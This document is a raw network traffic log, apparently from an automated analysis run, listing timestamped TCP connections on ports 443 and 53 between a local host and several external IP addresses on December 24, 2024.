                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896584034 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896595001 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896673918 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896694899 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896702051 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896708965 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896819115 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896837950 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896850109 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896856070 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.897011042 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.897023916 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.897073984 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.897077084 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.455496073 CET50005443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.455516100 CET44350005162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.455662012 CET50006443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.455697060 CET44350006162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.539268017 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.539346933 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.539493084 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.539493084 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.539593935 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.539602041 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.579400063 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.579441071 CET44350107188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.579545975 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.579749107 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.579765081 CET44350107188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.589788914 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.589824915 CET4435011020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.589886904 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.591181993 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.591192961 CET4435011020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.977440119 CET44350107188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.977519035 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.978056908 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.978069067 CET44350107188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.979743958 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.979753017 CET44350107188.245.216.205192.168.2.6
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.908287048 CET5651653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:27.045588017 CET53565161.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.673049927 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.166798115 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.227776051 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.537197113 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.783471107 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.794567108 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.794585943 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.794667959 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.794682026 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.802707911 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.803878069 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.804307938 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.805818081 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.814917088 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.097486973 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121190071 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121264935 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121274948 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121290922 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121299982 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121309042 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121613026 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121742010 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.122476101 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.130270958 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.131922007 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.132087946 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.151933908 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.316623926 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.316665888 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.316678047 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.316886902 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.317373037 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.318594933 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.325211048 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.435455084 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.463840961 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.466448069 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.646193027 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.646291018 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.646301985 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.646311998 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.646851063 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.646935940 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.650347948 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.652007103 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.665643930 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.666316032 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.960866928 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.997117043 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.961328030 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.961498976 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.984811068 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.984965086 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.276895046 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.277733088 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.277956963 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.278366089 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.279196024 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.279402971 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.300685883 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.301060915 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.301848888 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.301951885 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.302345991 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.584881067 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.585591078 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.192418098 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.192620993 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.379097939 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.379144907 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.382493019 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.382519007 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.382539988 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:33.382566929 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.302709103 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.321367979 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.321619034 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.329336882 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.332721949 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.337413073 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.344322920 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.345540047 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.352111101 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.358424902 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.363197088 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.364631891 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.372406960 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.372746944 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.377892017 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.385751009 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.386090040 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.392539978 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.398510933 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.399576902 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.404427052 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.410312891 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.415031910 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.416532040 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.422146082 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.429049015 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.432349920 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.435225964 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.436575890 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.441138029 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.447251081 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.452878952 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.459160089 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.465888023 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.471523046 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.478874922 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.483200073 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.486984015 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.487329960 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.487373114 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.487426996 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.489420891 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.496288061 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.497256994 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.502485037 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.510941982 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.514518976 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.514776945 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.520647049 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.523910999 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.525682926 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.545279980 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.545299053 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.545315981 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.545589924 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.545674086 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.550782919 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.557601929 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.557796001 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.592953920 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.592978001 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.592994928 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.593112946 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.593128920 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.593231916 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.593276024 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.593338013 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.593401909 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.598797083 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.605885029 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.606092930 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.615724087 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.618429899 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.618856907 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.623589993 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.634262085 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:34.634505987 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.330302954 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.339488029 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.340369940 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.341691971 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.342416048 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.532016993 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.532160997 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.599039078 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.614291906 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.619096041 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.624634981 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.624821901 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627089024 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627227068 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627487898 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627510071 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627535105 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627545118 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627562046 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627650976 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627666950 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627682924 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627708912 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627724886 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627737999 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.627861023 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.647908926 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.660341024 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.676767111 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.748090982 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.748114109 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.748150110 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.748159885 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.748163939 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.748439074 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.748675108 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.748797894 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.848345995 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.850725889 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.850883007 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.853724003 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.941550016 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.942537069 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.942750931 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.943604946 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.979036093 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.991010904 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:35.991245031 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.094253063 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.290174961 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.293345928 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.294684887 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.296377897 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.296848059 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.305870056 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.306368113 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.307651997 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.312781096 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.605142117 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.606328964 CET44362882172.64.41.3192.168.2.6
